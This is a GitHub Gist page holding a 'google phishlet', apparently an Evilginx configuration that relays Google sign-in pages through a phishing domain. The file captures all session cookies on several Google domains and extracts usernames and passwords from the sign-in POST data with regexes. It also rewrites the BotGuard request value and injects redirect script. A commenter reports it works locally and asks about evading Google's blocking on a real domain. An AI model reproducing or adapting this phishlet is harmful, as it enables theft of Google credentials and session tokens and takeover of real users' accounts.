Created
February 16, 2022 08:57
-
-
Save JamesIT/6ea4febfd0149205a4e5d636b63aac19 to your computer and use it in GitHub Desktop.
google phishlet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| author: '@TomAbel' | |
| min_ver: '2.3.0' | |
| proxy_hosts: | |
| - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} | |
| - {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true, is_landing: false, auto_filter: true} | |
| sub_filters: | |
| - {triggers_on: 'accounts.google.com', orig_sub: '', domain: '', search: '(bgRequest=[A-z])\)', replace: "${1}) && (e.bgRequest[Object.keys(e.bgRequest)[2]][1] = \"FNL\")", mimes: ['text/html', 'application/json']} | |
| - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']} | |
| - {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html']} | |
| auth_tokens: | |
| - domain: '.google.com' | |
| keys: [".*,regexp"] | |
| - domain: 'accounts.google.com' | |
| keys: [".*,regexp"] | |
| - domain: 'myaccount.google.com' | |
| keys: [".*,regexp"] | |
| - domain: 'mail.google.com' | |
| keys: [".*,regexp"] | |
| credentials: | |
| username: | |
| key: 'f.req' | |
| search: '\[\]\]\,\"([^"]*)\"\,' | |
| type: 'post' | |
| password: | |
| key: 'f.req' | |
| search: ',\["([^"]*)",.*?\]\]\]' | |
| type: 'post' | |
| auth_urls: | |
| - '/CheckCookie' | |
| login: | |
| domain: 'accounts.google.com' | |
| path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin' | |
| js_inject: | |
| - trigger_domains: ['myaccount.google.com'] | |
| trigger_paths: ['.*?'] | |
| script: | | |
| (function () { | |
| 'use strict'; | |
| let subdomain = window.location.host.split('.')[0]; | |
| if (subdomain == "myaccount") { | |
| window.location.host = "myaccount.google.com"; | |
| // console.log("redirecting to myaccount.google.com"); | |
| } | |
| }()); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi, @JamesIT
thank you for the phishlet. it works fine on localhost. I just had to edit the regexp to capture the credentials.
i've read that these google phishlets only work in developer mode, once you get a domain name and test it in the real world google blocks you immediatly using their Botguard script :
https://github.com/Proxyabel/evilginx.botguard
I just want to know if you tested this with a real domain before I get mine blocked.
Thanks.